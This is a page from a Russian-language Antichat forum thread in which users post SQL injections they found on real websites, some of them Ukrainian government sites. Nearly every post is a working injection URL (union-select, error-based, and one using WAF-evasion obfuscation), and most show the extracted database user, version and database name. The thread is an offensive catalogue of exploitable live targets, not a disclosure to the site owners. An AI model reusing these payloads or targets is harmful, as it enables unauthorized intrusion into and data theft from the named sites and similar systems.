Форум АНТИЧАТ
Страница 1 из 27 1 2 3 4 5 11 > Последняя »
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   SQL Инъекции (https://forum.antichat.xyz/showthread.php?t=424558)

faza02 27.04.2015 20:15
Постим сюда найденные SQL инъекции. Прежде, чем запостить, проверьте, не выкладывалась ли SQLi ранее:

Код:
Code:
Google: site:forum.antichat.ru [ваш сайт с SQLi]
Предыдущая тема: /threads/21336/

ВНИМАНИЕ !!! Все инъекции заключаем в тег [ CODE ] [ / CODE ], ни каких [ URL ] [ / URL ] быть не должно.

Правила этой темы:
  1. Инъекции вида:

    Код:
    Code:
    http://site.ru/index.php?a='
    будут удаляться. Также желательно в посте указывать версию БД.
  2. В теме запрещается публиковать пароли и хеши к админкам. Они будут удаляться, а нарушители - наказываться.
  3. Флейм/оффтоп удаляется и жестко наказывается.

kingbeef 29.04.2015 13:51
Скуля с выводом в адресной строке

Код:
Code:
http://www.mmlf.ru/?go=members&sid=29%27+and+0+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13--+k
5.5.36-34.0-632.precise

gromoza 30.04.2015 09:54
Код:
Code:
http://machouse.ua/solutions/s2/pre-press/sys_ctp/treatment_digital_pl/g-j-raptor--85-polymer-cou-dlja-fotopolimernykh-plactin"and(select 1 from(select count(*),concat((select user() from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and".html
(1062) Duplicate entry 'macnew@127.0.0.11' for key 'group_key'

MaxFast 30.04.2015 10:21
Код:
Code:
http://infoeco.ru/ecomobile/index.php?id=34&datePointId=-6755 union select 1,2,3,4,5,6,concat(user(),0x3a,database()),8,9,10,11,12,13,14--
ecomobil@localhost:ecomobil

teh 03.05.2015 23:47
Код:
Code:
http://landscrona.ru/media/index.php?id=-2825%20union%20select%201,2,3,user%28%29,version%28%29,database%28%29,7,8,9,10,11,12,13,14,15--
crona_site 5.5.25 db_crona@localhost

teh 07.05.2015 22:40
Код:
Code:
http://dzz.gov.ua/CPOSI/style/page_2/templer_page2_ru.php?id=21%20union%20select%201,2,3,concat%28user%28%29,0x3c62723e,version%28%29,0x3c62723e,database%28%29%29,5,%27fox%20tech%27,7,8--&table=info
znvc@localhost

5.1.73

CPOSI

Код:
Code:
http://khersonryboohorona.gov.ua/newscomdet.php?id=5&mod=-393%20union%20select%201,2,concat%28user%28%29,0x3c62723e,version%28%29,0x3c62723e,database%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--&lang=


ruboohran_riba@192.168.1.28

5.5.27-log

ruboohran_riba

reuvenmatbil 09.05.2015 11:08
Код:
Code:
http://www.satena.com/about-us/board-of-directors/(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(75),CHAR(80),CHAR(112),CHAR(53),CHAR(111),CHAR(89),CHAR(89),CHAR(81)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

MaxFast 10.05.2015 19:29
Код:
Code:
http://www.astera.ru/it-top/?type=-2'+union+select+1,2,3,4,5,0x456e6a6f7921,7,8,9+--+&year=2015&month=2
Будьте внимательны, MySQL 4

fakecoder 14.05.2015 02:28
Код:
Code:
invest-expert.info/articles.php?article_id=-130'+union+select+(version()),2,3--+
in TITLE

8k hosts/day

кому интересно повоевать с waf... хотя faza ужо замочил...

Код:
Code:
http://www.mkap.ru/newsview.php?id=1475+and+1=1
CY 250, PR 4

faza02 14.05.2015 02:55
Цитата:
Сообщение от fakecoder
fakecoder said:

кому интересно повоевать с waf
Код:
Code:
http://www.mkap.ru/newsview.php?id=1475+and+1=1
CY 250, PR 4
посты лучше склеить

Код:
Code:
http://www.mkap.ru/newsview.php?id=-1475+/*!12345union*//*!12345%73%65%6c%65%63%74*/version(),2,3,4--+
5.0.77-log


Время: 16:14
Страница 1 из 27 1 2 3 4 5 11 > Последняя »
Показывать 40 сообщений этой темы на одной странице